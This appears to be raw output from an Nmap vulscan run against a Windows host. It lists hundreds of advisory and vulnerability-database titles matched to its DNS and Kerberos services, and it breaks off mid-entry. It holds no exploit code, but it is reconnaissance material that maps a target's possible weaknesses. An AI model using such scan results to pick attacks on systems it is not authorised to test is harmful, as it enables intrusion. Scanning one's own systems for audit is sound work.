[67651] FreeBSD Ports: mDNSResponder [66822] FreeBSD Ports: powerdns-recursor [66776] Debian Security Advisory DSA 1968-2 (pdns-recursor) [66734] Debian Security Advisory DSA 1968-1 (pdns-recursor) [66043] Fedora Core 10 FEDORA-2009-10252 (dnsmasq) [66037] Fedora Core 11 FEDORA-2009-10285 (dnsmasq) [65981] SLES10: Security update for perl-Net-DNS [65715] SLES11: Security update for dnsmasq [65585] SLES9: Security update for perl-Net-DNS [64925] Gentoo Security Advisory GLSA 200909-19 (dnsmasq) [64830] CentOS Security Advisory CESA-2009:1238 (dnsmasq) [64829] FreeBSD Ports: dnsmasq [64827] Ubuntu USN-827-1 (dnsmasq) [64819] Debian Security Advisory DSA 1876-1 (dnsmasq) [64419] Debian Security Advisory DSA 1831-1 (djbdns) [63960] Debian Security Advisory DSA 1795-1 (ldns) [63406] Fedora Core 9 FEDORA-2009-1069 (dnsmasq) [63154] Gentoo Security Advisory GLSA 200901-03 (pdnsd) [63034] Gentoo Security Advisory GLSA 200812-19 (pdns) [61597] Gentoo Security Advisory GLSA 200809-02 (dnsmasq) [61478] Slackware Advisory SSA:2008-205-01 dnsmasq [61375] Debian Security Advisory DSA 1623-1 (dnsmasq) [61371] Debian Security Advisory DSA 1619-1 (python-dns) [61360] Debian Security Advisory DSA 1544-2 (pdns-recursor) [60837] FreeBSD Ports: powerdns-recursor [60822] Gentoo Security Advisory GLSA 200804-22 (pdns-recursor) [60790] Debian Security Advisory DSA 1544-1 (pdns-recursor) [60567] Debian Security Advisory DSA 1515-1 (libnet-dns-perl) [60279] Gentoo Security Advisory GLSA 200801-16 (maradns) [60148] FreeBSD Ports: maradns [60101] Debian Security Advisory DSA 1445-1 (maradns) [60045] Debian Security Advisory DSA 1434-1 (mydns) [58819] FreeBSD Ports: p5-Net-DNS [58541] Gentoo Security Advisory GLSA 200708-06 (net-dns) [58425] Debian Security Advisory DSA 1319-1 (maradns) [57584] Debian Security Advisory DSA 1211-1 (pdns) [56725] Gentoo Security Advisory GLSA 200605-10 (pdnsd) [56241] Debian Security Advisory DSA 963-1 (mydns) [56228] Gentoo Security Advisory GLSA 200601-16 (MyDNS) [56055] Debian Security Advisory DSA 928-1 (dhis-tools-dns) [55172] Debian Security Advisory DSA 786-1 (simpleproxy) [54905] Gentoo Security Advisory GLSA 200504-03 (Dnsmasq) [54892] Gentoo Security Advisory GLSA 200503-27 (dyndnsupdate) [54847] Gentoo Security Advisory GLSA 200502-15 (PowerDNS) [54477] Debian Security Advisory DSA 771-1 (pdns) [54410] FreeBSD Ports: powerdns [54386] Slackware Advisory SSA:2005-201-01 dnsmasq [53957] Slackware Advisory SSA:2005-111-02 Python SimpleXMLRPCServer module [52187] FreeBSD Ports: powerdns [19693] CMSimple index.php guestbook XSS [19692] CMSimple index.php search XSS [18356] DNS Server on UDP and TCP [18182] RM SafetyNet Plus XSS [16137] Simple PHP Blog dir traversal [15753] Multiple Vendor DNS Response Flooding Denial Of Service [14713] Simple Form Mail Relaying via Subject Tags Vulnerability [14712] MailEnable SMTP Connector Service DNS Lookup DoS Vulnerability [14224] Simple Form Mail Relaying Vulnerability [12233] eMule Plus Web Server detection [12112] Oracle 9iAS iSQLplus XSS [11927] TelCondex Simple Webserver Buffer Overflow [11433] Microsoft ISA Server DNS - Denial Of Service (MS03-009) [11035] AnalogX SimpleServer:WWW DoS [10774] ShopPlus Arbitrary Command Execution [10705] SimpleServer remote execution [10595] DNS AXFR SecurityTracker - https://www.securitytracker.com: [1028232] Cisco Wireless LAN Controller mDNS Buffer Handling Flaw Lets Remote Users Deny Service [1028046] ISC BIND DNS64 and Response Policy Zones (RPZ) Bug Lets Remote Users Deny Service [1027835] ISC BIND DNS64 Bug Lets Remote Users Deny Service [1027580] Cisco IOS Intrusion Prevention System DNS Processing Bug Lets Remote Users Deny Service [1027296] BIND DNSSEC Validation Cache Failure Lets Remote Users Deny Service [1027291] Google Android DNS Resolver Randomization Flaw Lets Remote Users Poison the DNS Cache [1026821] MaraDNS Cache Update Policy Can Be Bypassed to Allow Revoked Domain Names to Remain Resolvable [1026820] MaraDNS Hash Table Collision in Zone Files Lets Local Users Deny Service [1026789] Microsoft DNS Server Lets Remote Users Deny Service [1026730] PowerDNS Recursor Cache Update Policy Can Be Bypassed to Allow Revoked Domain Names to Remain Resolvable [1026729] PowerDNS Authoritative Server Packet Loop Lets Remote Users Deny Service [1026689] Python Simple XML-RPC Server Module Lets Remote Users Deny Service [1026520] ISC DHCP DDNS DHCPv6 Lease Processing Bug Lets Remote Users Deny Service [1026482] MaraDNS Hash Table Collision Bug Lets Remote Users Deny Service [1025894] Microsoft DNS Server Flaws Let Remote Users Execute Arbitrary Code and Deny Service [1025332] Windows DNS Resolution LLMNR Processing Flaw Lets Remote Users Execute Arbitrary Code and Local Users Gain Elevated Privileges [1025326] HP-UX Unspecified Flaw in NFS/ONCplus Lets Local Users Deny Service [1025162] Linux Kernel dns_resolver Key Processing Error Lets Local Users Deny Service [1025110] BIND IXFR Transfer/DDNS Update Flaw Lets Remote Users Deny Service [1024773] Apple iOS Mail DNS Prefetching Bug Lets Remote Users Determine if Mail Was Read [1024417] Apache Traffic Server Insufficient Randomization Lets Remote Users Poison the DNS Cache [1024241] Linux Kernel CIFS Filesystem DNS Lookup Caching Bug Lets Local Users Poison the Cache [1024200] Avahi Multicast DNS Packet Processing Error in AvahiDnsPacket() Lets Remote Users Deny Service [1023994] HP-UX Integer Overflow in ONCPlus 'rpc.pcnfsd' Lets Remote Users Execute Arbitrary Code [1023964] CA Internet Security Suite Plus Lets Local Users Bypass Anti-Malware Protection [1023939] Windows SMTP Service Uses Predictable Transaction IDs and Fails to Validate Response IDs Which May Permit DNS Spoofing [1023758] HP-UX NFS/ONCplus Inadvertently Enables NFS [1023520] Squid Processing of Header-Only DNS Messages Lets Remote Users Deny Service [1023474] BIND DNSSEC NSEC/NSEC3 Error May Let Remote Users Spoof NXDOMAIN Responses [1023404] PowerDNS Recursor Unspecified Bug Lets Remote Users Spoof the DNS [1023403] PowerDNS Recursor Buffer Overflow May Let Remote Users Execute Arbitrary Code [1023237] BIND DNSSEC Validation Flaw Lets Remote Servers Add to the Cache [1022945] IBM Lotus Connections Input Validation Flaw in 'simpleSearch.do' Permits Cross-Site Scripting Attacks [1022793] Dnsmasq TFTP Service Heap Overflow and Null Pointer Dereference Lets Remote Users Execute Arbitary Code [1022665] Mozilla Firefox SOCKS5 DNS Name Length Error Lets Remote Users Corrupt Data [1022613] BIND Dynamic Update Bug in dns_db_findrdataset() Lets Remote Users Deny Service [1022493] HP-UX NFS/ONCplus Unspecified Bug Lets Local Users Deny Service [1021831] Microsoft DNS Server Bugs Let Remote Users Spoof the DNS Service [1021830] Microsoft DNS Server Registration Validation Flaw Lets Remote Users Conduct Spoofing Attacks [1021692] HP-UX NFS/ONCplus Unspecified Bug Lets Remote Users Deny Service [1021662] Simple Machines Forum Input Validation Hole Permits Cross-Site Scripting Attacks [1021530] Cisco Application Control Engine Global Site Selector DNS Bug Lets Remote Users Deny Service [1021486] Avahi Bug in Processing mDNS Packets Lets Remote Users Deny Service [1021463] Infoblox NIOS DNS Query Port Entropy Weakness Lets Remote Users Spoof the System [1021304] PowerDNS Bug in Processing HINFO CH Queries Lets Remote Users Deny Service [1021147] Adobe Flash Player Lets Remote Users Conduct DNS Rebinding Attacks [1020993] HP-UX NFS/ONCplus Unspecified Bug Lets Remote Users Deny Service [1020933] Cisco IOS Intrusion Prevention System Bug in 'SERVICE.DNS' Signature Engine Lets Remote Users Deny Service [1020849] Cisco Application Control Engine Predictable Source Port Address Translation May Leave DNS Servers Vulnerable to Recent Cache Poisoning Attack [1020845] Apple Bonjour for Windows mDNSResponder Null Pointer Dereference Lets Users Deny Service [1020844] Apple Bonjour for Windows DNS Query Port Entropy Weakness Lets Remote Users Spoof the System [1020804] Citrix Access Gateway DNS Query Port Entropy Weakness Lets Remote Users Spoof the System [1020802] Nortel Business Communications Manager DNS Query Port Entropy Weakness Lets Remote Users Spoof the System [1020653] Ruby 'resolv.rb' DNS Query Port Entropy Weakness Lets Remote Users Spoof the System [1020651] Dnsmasq DNS Query Port Entropy Weakness Lets Remote Users Spoof the System [1020579] Cisco IOS Predictable Source Port Address Translation May Leave DNS Servers Vulnerable to Recent Cache Poisoning Attack [1020578] Cisco Content Switching Module Predictable Source Port Address Translation Leaves DNS Servers Vulnerable to Recent Cache Poisoning Attack [1020577] Cisco Firewall Service Module Predictable Source Port Address Translation Leaves DNS Servers Vulnerable to Recent Cache Poisoning Attack [1020576] Cisco ASA Predictable Source Port Address Translation Leaves DNS Servers Vulnerable to Recent Cache Poisoning Attack [1020575] Cisco PIX Firewall Predictable Source Port Address Translation Leaves DNS Servers Vulnerable to Recent Cache Poisoning Attack [1020561] Secure Computing Sidewinder DNS Query Port Entropy Weakness Lets Remote Users Spoof the System [1020560] Adonis DNS Query Port Entropy Weakness Lets Remote Users Spoof the System [1020558] Citrix NetScaler DNS Query Port Entropy Weakness Lets Remote Users Spoof the System [1020548] Blue Coat ProxySG DNS Query Port Entropy Weakness Lets Remote Users Spoof the System [1020449] Juniper JUNOS DNS Query Port Entropy Weakness Lets Remote Users Spoof the System [1020448] Juniper ScreenOS DNS Query Port Entropy Weakness Lets Remote Users Spoof the System [1020440] Cisco IOS DNS Query Port Entropy Weakness Lets Remote Users Spoof the System [1020438] BIND DNS Query Port Entropy Weakness Lets Remote Users Spoof the System [1020437] Windows DNS Service Bugs Let Remote Users Spoof the System [1020359] Novell GroupWise Input Validation Hole in the WebAccess Simple Interface Permits Cross-Site Scripting Attacks [1019802] Windows DNS Client Lets Remote Users Spoof the System [1019768] Cisco Unified Communications Disaster Recovery Framework Lets Remote Users Execute Arbitrary Commadns [1019662] Mac OS X mDNSResponder Format String Flaw Lets Local Users Execute Arbitrary Code [1019406] Cisco Unified IP Phone Buffer Overflow in Parsing DNS Responses Lets Remote Users Execute Arbitrary Code [1019104] Net::DNS Bug in Processing DNS Response Packets Lets Remote Users Deny Service [1018979] Mozilla Firefox subjectAltName:dNSName Attribute Validation Flaw Lets Remote Users Spoof Certificates [1018942] Microsoft Windows DNS Service Insufficent Entropy Lets Remote Users Spoof the DNS Service [1018615] BIND 8 Transaction ID Generation Algorithm Lets Remote Users Conduct DNS Cache Poisoning Attacks [1018399] Mac OS X Unspecified mDNSResponder Bug Lets Remote Users Execute Arbitrary Code [1018377] Perl Net::DNS Perdicatable Sequence IDs Let Remote Users Spoof DNS Responses [1018376] Perl Net::DNS Lets Remote Users Deny Service With Malformed DNS Packets [1018260] Simple Machines Forum Bugs Let Remote Users Execute Arbitrary Code or Bypass the Sound-Based CAPTCHA Function [1018201] MaraDNS Memory Leak Lets Remote Users Deny Service [1018123] Mac OS X Buffer Overflow in mDNSResponder Lets Remote Users Execute Arbitrary Code [1018088] FreeType Integer Overflow in TT_Load_Simple_Glyph() Lets Remote Users Execute Arbitrary Code [1017910] Microsoft Windows DNS Service RPC Stack Overflow Lets Remote Users Execute Arbitrary Code [1017573] BIND DNSSEC Validation Bug Lets Remote Users Deny Service [1017445] CMS Made Simple Input Validation Flaw in Comments Module Permits Cross-Site Scripting Attacks [1017284] WinGate DNS Request Processing Bug Lets Remote Users Deny Service [1017272] SSO Plus Insecure Default Permissions Let Local Users Obtain Elevated Privileges [1017267] My Firewall Plus Lets Local Users Gain System Privileges [1017155] iodine DNS Response Buffer Overflow Lets Remote Users Execute Arbitrary Code [1017067] Kerio WinRoute Firewall Can Be Crashed With a Specially Crafted DNS Response [1016824] Simpleboard Include File Bug in 'file_upload.php' Lets Remote Users Execute Arbitrary Code [1016793] simple Blog Input Validation Flaw in 'id' Parameter Lets Remote Users Inject SQL Commands [1016653] Windows Winsock and DNS Client Buffer Overflows Let Remote Users Execute Arbitrary Code [1016644] PHP Simple Shop Include File Error in 'abs_path' Parameter Lets Remote Users Execute Arbitrary Code [1016615] Lhaplus Buffer Overflow in Extracting LZH Archives Lets Remote Users Execute Arbitrary Code [1016252] Cisco WebVPN Input Validation Hole in 'dnserror.html' Permits Cross-Site Scripting Attacks [1015997] 3Com Baseline Switch 2848-SFP Plus Lets Remote Users Deny Service With Specially Crafted DHCP Packets [1015992] JUNOSe DNS Response Bug Lets Remote Users Deny Service [1015991] DeleGate Can Be Crashed By Remote Systems Returning Specially Crafted DNS Responses [1015990] MyDNS Can Be Crashed By Remote Users Sending a 'Query-of-Death' Request [1015989] pdnsd Bug in Processing ADNS Queries Lets Remote Users Deny Service [1015975] Cisco Subscriber Edge Services Manager Can Be Crashed With Specially Crafted Compressed DNS Data [1015606] HP Tru64 UNIX DNS BIND4/BIND8 Facilitates Cache Corruption Attacks [1015521] MyDNS Service Can Be Crashed By Remote Users [1015495] Dual DHCP DNS Server Buffer Overflow Lets Remote Users Execute Arbitrary Code [1015323] SimpleBBS Input Validation Hole in 'name' Parameter Lets Remote Users Execute Arbitrary Commands [1015064] Comersus BackOffice Plus Input Validation Hole in 'searchItemForm.asp' Permits Cross-Site Scripting Attacks [1014971] CMS Made Simple Input Validation Flaw in 'page' Parameter Permits Cross-Site Scripting Attacks [1014817] Simple PHP Blog 'comment_delete_cgi.php' Lets Remote Users Delete Arbitrary Files [1014556] CMSimple Input Validation Hole in 'index.php' in 'search' Parameter Permits Cross-Site Scripting Attacks [1014504] PowerDNS Input Validation Flaw in LDAP Backend and Error In Processing Restricted Recursion Requests Let Remote Users Deny Service [1014494] Simple Message Board Input Validation Holes Permit Cross-Site Scripting Attacks [1014351] Simple Machines Forum Input Validation Hole in 'msg' Parameter Lets Remote Users Inject SQL Commands [1014046] Cisco ACNS Can Be Crashed With Specially Crafted Compressed DNS Data [1014045] Cisco Unity Express Can Be Crashed With Specially Crafted Compressed DNS Data [1014044] Cisco ATA Can Be Crashed With Specially Crafted Compressed DNS Data [1014043] Cisco IP Phones Can Be Crashed With Specially Crafted Compressed DNS Data [1013952] Squid May Let Remote Users Spoof DNS Lookup Reponses [1013916] CJUltra Plus Input Validation Vulnerability in 'out.php' Permits SQL Injection [1013888] SimpleCam Directory Traversal Flaw Discloses Files to Remote Users [1013749] CityPost Simple PHP Upload Input Validation Hole Permits Cross-Site Scripting Attacks [1013748] PMSoftware Simple Web Server Buffer Overflow Lets Remote Users Execute Arbitrary Code [1013661] PopUp Plus Miranda IM Plugin Buffer Overflow Lets Remote Users Execute Arbitrary Code [1013452] Symantec Enterprise Firewall DNSd Proxy Bug Lets Remote Users Poison the DNS Cache [1013451] Symantec VelociRaptor DNSd Proxy Bug Lets Remote Users Poison the DNS Cache [1013450] Symantec Gateway Security DNSd Proxy Bug Lets Remote Users Poison the DNS Cache [1013167] Squid Proxy xstrdup() Can Be Crashed With Malformed DNS Responses [1013083] Python SimpleXMLRPCServer May Let Remote Users Access Internal Data or Execute Arbitrary Code [1012996] BIND 8 Buffer Overflow in q_usedns Array Lets Remote Users Deny Service [1012926] CMSimple Input Valdation Bug in Search and Guestbook Let Remote Users Conduct Cross-Site Scripting Attacks [1012904] Exim Buffer Overflow in dns_build_reverse() Lets Local Users Obtain Elevated Privileges [1012809] Simple PHP Blog Discloses Files to Remote Users and Lets Remote Users Create Directories [1012644] My Firewall Plus Help Function Lets Local Users Gain System Privileges [1012329] Cyrus IMAP 'imap magic plus' Buffer Overflow Lets Remote Users Execute Arbitrary Code [1012221] Thomson Speed Touch Pro ADSL Lets Remote Users Modify the DNS via DHCP [1012157] Axis Network Camera DNS Loopback Error Lets Remote Users Deny Service [1012155] Microsoft Internet Security and Acceleration Server Reverse DNS Caching Bug Lets Remote Users Spoof Web Sites [1012154] Microsoft Proxy Server Reverse DNS Caching Bug Lets Remote Users Spoof Web Sites [1012111] ISC DHCP DNS Logging Format String Flaw May Let Remote Users Execute Arbitrary Code [1011941] Libxml2 URL Parsing and DNS Resolution Buffer Overflows May Let Remote Users Execute Arbitrary Code [1011844] Protector Plus Fails to Scan Files Named With MS DOS Device Names [1011636] Microsoft SMTP Service Buffer Overflow in Processing DNS Responses May Let Remote Users Execute Arbitrary Code [1011334] DNS4Me Lets Remote Users Crash the Web Service and Conduct Cross-Site Scripting Attacks [1011238] mod_cplusplus Buffer Overflow Has Unspecified Impact [1011198] MailEnable Can Be Crashed By a Remote DNS Server [1011126] Oracle Application Server Has Multiple Portal and iSQLPlus Flaws That Let Remote Users Take Control of the Server [1010927] F5 3-DNS May Disclose UDP Port Status to Remote Users [1010543] DNS One Appliance Input Validation Holes in DHCP Reporting Lets Remote Users Inject Scripting [1010500] Symantec Enterprise Firewall DNSD Proxy Can Be Poisoned By Remote Users [1010146] Norton AntiSpam SYMDNS.SYS Driver Lets Remote Users Execute Arbitrary Code to Take Full Control of the System [1010145] Symantec Client Security SYMDNS.SYS Driver Lets Remote Users Execute Arbitrary Code to Take Full Control of the System [1010144] Symantec Client Firewall SYMDNS.SYS Driver Lets Remote Users Execute Arbitrary Code to Take Full Control of the System [1010070] Simple Machines SMF '[size]' Tag Lets Remote Users Conduct Cross-Site Scripting Attacks [1009876] Symantec Norton Internet Security SYMDNS.SYS Driver Lets Remote Users Execute Arbitrary Code to Take Full Control of the System [1009343] nfs-utils Incorrect DNS Settings May Let Remote Users Crash rpc.mountd [1008838] Oracle HTTP Server 'isqlplus' Input Validation Flaws Let Remote Users Conduct Cross-Site Scripting Attacks [1008695] SimpleData Authentication Flaw May Yield Access to Remote Users [1008136] tc.SimpleWebServer '.../' Directory Traversal Flaw Discloses Files to Remote Users [1008036] tc.SimpleWebServer Buffer Overflow in Processing the HTTP Referer Lets Remote Users Execute Arbitrary Code [1007564] Sendmail DNS Map Initialization Flaw May Let Remote Users Crash the System [1007036] Simple Dynamic Finger Daemon (sdfingerd) Lets Local Users Obtain Root Privileges [1006972] silentThought Simple Web Server Directory Traversal Flaw Discloses Files to Remote Users [1006684] Cisco Content Service Switches May Provide Incorrect DNS Responses Resulting in Denial of Service Conditions [1006562] SheerDNS Directory Traversal and Buffer Overflow Bugs Allow Local Users (and Possibly Remote Users) to Gain Root Privileges [1006366] SimpleChat! Discloses Information About Current Users to Remote Users [1006322] Microsoft ISA Server DNS Intrusion Detection Flaw Lets Remote Users Block DNS Inbound Requests [1006251] SimpleBBS Discloses User Account Names and Information to Remote Users [1006047] Posadis DNS Server Buffer Overflow May Let Remote Users Crash the Server [1005926] D-Link AirPlus Access Point Manager Allows Remote Users to Upgrade Firmware Without Authentication [1005922] WebCollection Plus Discloses Files on the System to Remote Users [1005896] Insightful's S-PLUS Uses Unsafe Temporary Files That May Let Local Users Modify Files or Obtain Elevated Privileges [1005691] BIND Domain Name Software Allows Remote Users to Spoof the DNS [1005585] Simple Web Server Lets Remote Users Bypass File Access Controls [1005570] 'nss_ldap' Buffer Overflow in DNS Code May Allow Remote Users to Execute Arbitrary Code [1005516] Oracle iSQLPlus Buffer Overflow in Oracle9i Database Server May Let Remote Users Execute Arbitrary Code [1005439] PlanetDNS Server Software Buffer Overflow Allows Remote Users to Execute Arbitrary Code [1004842] StatsPlus Web Server Statistics Package Allows Remote Users to Inject Arbitrary Script Commands into the Statistics Log and Conduct Cross-site Scripting Attacks [1004686] APC PowerChute Plus for Windows Default Configuration Creates a Shared Folder with World Writeable Permissions [1004662] Simple Wide Area Information Service (SWAIS) Input Validation Flaw Lets Remote Users Execute Shell Commands on the System [1004645] AnalogX SimpleServer:Shout Streaming Audio Server Buffer Overflow May Give Remote Users System Level Access on the Server [1004533] Util-linux 'simpleinit' Component Leaves Open File Descriptor in Some Child Processes, Letting Local Users Gain Root Privileges [1004531] AnalogX SimpleServer:WWW Web Server Can Be Crashed By Remote Users [1004461] LogiSense DNS Manager System Has Input Validation Flaw That Allows Remote Users to Gain Access to the Application and Possibly Execute Arbitrary Commands [1004453] BIND DNS Server Software Error Handling Bug May Let Remote Users Crash the Name Server [1004174] DNSTools Authentication Flaw Lets Remote Users Access the Application to Make DNS Changes Without Authenticating [1004173] Blahz DNS Authentication Design Weakness Lets Remote Users Access the Application [1004037] Webalizer Buffer Overflow Allows Remote Users to Execute Arbitrary Code on the Server via Reverse DNS Lookups [1003929] Caldera OpenLinux Name Service Cache Daemon (ncsd) Flaw May Let Users Spoof the DNS and Bypass Security Checks [1003906] Xchat '/dns' Command Bug May Let Remote Users Execute Arbitrary Commands on the Client Software [1003901] Posadis DNS Server Format String Flaw May Let Remote Users Execute Arbitrary Code on the Server [1003896] Squid Proxy Caching Server Heap Overflow in Processing Compressed DNS Responses Could Allow Remote DNS Servers to Crash the Service [1003857] ARSC Really Simple Chat Server Discloses Web Root Directory Location to Remote Users [1003618] MacOS DNS Bug Lets Remote DNS Servers Crash the Operating System [1003524] Many Simple Network Management Protocol (SNMP) Implementations Allow Remote Users to Deny Service or Obtain Access to the System [1003414] Cisco Tac_plus TACACS+ Developer Kit Uses Unsafe File Permissions That May Allow Local Users to Modify the Logs, Overwrite Arbitrary Files, and Potentially Execute Arbitrary Code on the System [1003314] Domain Name Relay Daemon (DNRD) Can Be Crashed By Remote Users Sending Certain DNS Requests [1003252] MaraDNS Malformed Packet Processing Bug Allows Remote Users to Cause the Server to Stop Responding to DNS Requests [1002681] Cyrus Simple Authentication and Security Layer (SASL) Library Contains Format String Bug That May Allow Remote Users to Execute Arbitrary Code with Root Level Privileges [1002527] Open Projects Network Internet Relay Chat (IRC) Server Software Lets Remote Users Spoof DNS Hostnames [1002354] ProFTPD Reverse DNS Feature Fails to Check Forward-to-Reverse DNS Mappings [1002332] ShopPlus Cart Commerce System Lets Remote Users Execute Arbitrary Shell Commands [1002317] Microsoft DNS Server Software Susceptible to DNS Cache Poisoning in Default Configuration, Allowing Remote Users to Inject False DNS Records in Certain Situations [1002221] Plus Technologies LPPlus Print Management System Lets Local Users Kill Any Processes and Print Any File [1002015] AnalogX SimpleServer:WWW Lets Remote Users Execute Arbitrary Code on the Server [1001721] BIND Domain Name System Software May Disclose DNS Transactional Signature (TSIG) Keys to Local Users [1001494] DSL_Vdns Virtual DNS Client for Dynamic IP Address Allows Remote Users to Crash the Software [1001349] AnalogX's Simple Server:WWW Web Server Can Be Crashed By Remote Users [1001186] Microsoft Windows Me Operating System and Windows 98 with the Plus! 98 Package Disclose Data Compression Passwords OSVDB - http://www.osvdb.org: [47155] Simple DNS Plus Reply Packet Saturation Remote DoS [74121] Simple Machines Forum (SMF) Search.php PlushSearch2 Function Cached Data Remote Information Disclosure
88	tcp	open	kerberos-sec	syn-ack	Microsoft Windows Kerberos		server time: 2022-06-20 09:02:58Z
	vulscan	VulDB - https://vuldb.com: [176500] Microsoft Windows 7 SP1 up to Server 2019 Kerberos AppContainer unknown vulnerability [103429] Microsoft Windows up to Server 2016 Kerberos privilege escalation [103420] Microsoft Windows up to Server 2016 Kerberos weak authentication [90709] Microsoft Windows up to Vista SP2 Kerberos privilege escalation [88644] Microsoft Windows 2000 Active Directory Kerberos Ticket Logging privilege escalation [68239] Microsoft Windows up to Vista Kerberos KDC EsikmoRoll privilege escalation [16822] Microsoft Windows 2000 Kerberos denial of service [6627] Microsoft Windows 7/Server 2008 R2 Kerberos denial of service [4295] Microsoft Windows 7/Server 2008 Kerberos weak authentication [4293] Microsoft Windows Server 2003/XP Kerberos CRC32 Checksum weak encryption [1691] Microsoft Windows 2000/Server 2003/XP Kerberos memory corruption [1690] Microsoft Windows 2000/Server 2003/XP Kerberos denial of service [176522] Microsoft Windows 7 SP1 up to Server 2019 MSHTML Platform unknown vulnerability [176520] Microsoft Windows 10 20H2 up to Server 2004 DWM Core Library unknown vulnerability [176515] Microsoft Windows 10 up to Server 2019 Hyper-V denial of service [176514] Microsoft Windows 8.1 up to Server 2019 Server for NFS information disclosure [176513] Microsoft Windows 8.1 up to Server 2019 Server for NFS information disclosure [176512] Microsoft Windows 8.1 up to Server 2019 NFS denial of service [176511] Microsoft Windows 7 SP1 up to Server 2019 GPSVC unknown vulnerability [176510] Microsoft Windows 7 SP1 up to Server 2019 Event Tracing information disclosure [176509] Microsoft Windows 7 SP1 up to Server 2019 HTML Platform unknown vulnerability [176508] Microsoft Windows 8.1 up to Server 2019 TCP/IP Driver denial of service [176507] Microsoft Windows 10 20H2 up to Server 2019 Cloud Files Mini Filter Driver unknown vulnerability [176506] Microsoft Windows 7 SP1 up to Server 2019 Remote Desktop Services denial of service [176499] Microsoft Windows 10 20H2/10 21H1/10 2004/Server 20H2/Server 2004 Bind Filter Driver information disclosure [176498] Microsoft Windows 7 SP1 up to Server 2019 Scripting Engine unknown vulnerability [176497] Microsoft Windows 7 SP1 up to Server 2019 NTLM unknown vulnerability [176495] Microsoft Windows 7 SP1 up to Server 2019 NTFS unknown vulnerability [176494] Microsoft Windows 10 20H2 up to Server 2004 Kernel information disclosure [176493] Microsoft Windows 7 SP1 up to Server 2019 Common Log File System Driver unknown vulnerability [176492] Microsoft Windows 7 SP1 up to Server 2019 Filter Manager unknown vulnerability [176491] Microsoft Windows 10 20H2 up to Server 2019 Kernel-Mode Driver unknown vulnerability [176490] Microsoft Windows 10 20H2 up to Server 2019 Kernel unknown vulnerability [176477] Microsoft Windows 7 SP1 up to Server 2019 Enhanced Cryptographic Provider unknown vulnerability [176474] Microsoft Windows 7 SP1 up to Server 2019 DCOM Server unknown vulnerability [174874] Microsoft Windows 7 SP1 up to Server 2019 Wireless Networking unknown vulnerability [174873] Microsoft Windows 7 SP1 up to Server 2019 Wireless Networking information disclosure [174871] Microsoft Windows 7 SP1 up to Server 2019 Wireless Networking unknown vulnerability [174870] Microsoft Windows 7 SP1 up to Server 2019 unknown vulnerability [174868] Microsoft Windows 8.1 up to Server 2019 CSC Service information disclosure [174866] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Container Manager Service unknown vulnerability [174865] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 HTTP Protocol Stack unknown vulnerability [174864] Microsoft Windows 10 20H2 up to Server 2019 Container Manager Service unknown vulnerability [174863] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Container Manager Service unknown vulnerability [174862] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Container Manager Service unknown vulnerability [174861] Microsoft Windows 10 20H2 up to Server 2019 Graphics unknown vulnerability [174849] Microsoft Windows 7 SP1 up to Server 2019 Bluetooth Driver unknown vulnerability [174848] Microsoft Windows 7 SP1 up to Server 2019 Infrared Data Association information disclosure [174847] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Desktop Bridge denial of service [174846] Microsoft Windows 7 SP1 up to Server 2019 RDP information disclosure [174845] Microsoft Windows 10 20H2 up to 10 2004 WalletService unknown vulnerability [174844] Microsoft Windows 7 SP1 up to Server 2019 Graphics unknown vulnerability [174843] Microsoft Windows 10 1809/Server 2019 Container Isolation FS Filter Driver unknown vulnerability [174842] Microsoft Windows 10 20H2 up to Server 2019 Projected File System FS Filter Driver information disclosure [174841] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Media Foundation Core unknown vulnerability [174840] Microsoft Windows 7 SP1 up to Server 2019 on SSDP Service unknown vulnerability [174839] Microsoft Windows 7 SP1 up to Server 2019 OLE Automation unknown vulnerability [174835] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 SMB Client Security Feature unknown vulnerability [174824] Microsoft Windows 7 SP1 up to Server 2019 Hyper-V VmsIfrInfoParams_OID_SWITCH_NIC_REQUEST unknown vulnerability [172949] Microsoft Windows 10 up to Server 2019 Media Photo Codec information disclosure [172947] Microsoft Windows 7 SP1 up to Server 2019 Internet Messaging API unknown vulnerability [172941] Microsoft Windows 7 SP1 up to Server 2019 Media Video Decoder unknown vulnerability [172937] Microsoft Windows 10 20H2 up to Server 2019 Hyper-V denial of service [172933] Microsoft Windows 10 20H2 up to Server 2019 Application Compatibility Cache denial of service [172929] Microsoft Windows 7 SP1 up to Server 2019 Media Video Decoder unknown vulnerability [172925] Microsoft Windows 10 20H2 up to Server 2019 TCP/IP Driver denial of service [172921] Microsoft Windows 7 SP1 up to Server 2019 DNS information disclosure [172920] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 SMB information disclosure [172919] Microsoft Windows 8.1 up to Server 2019 SMB information disclosure [172917] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172916] Microsoft Windows 7 SP1 up to Server 2019 DNS information disclosure [172915] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172914] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172913] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172912] Microsoft Windows 7 SP1 up to Server 2019 on Remote Procedure Call Runtime unknown vulnerability [172911] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172910] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172909] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172908] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172907] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172906] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172905] Microsoft Windows 7 SP1 up to Server 2019 on Remote Procedure Call Runtime unknown vulnerability [172904] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172903] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172902] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172901] Microsoft Windows 7 SP1 up to Server 2019 Remote 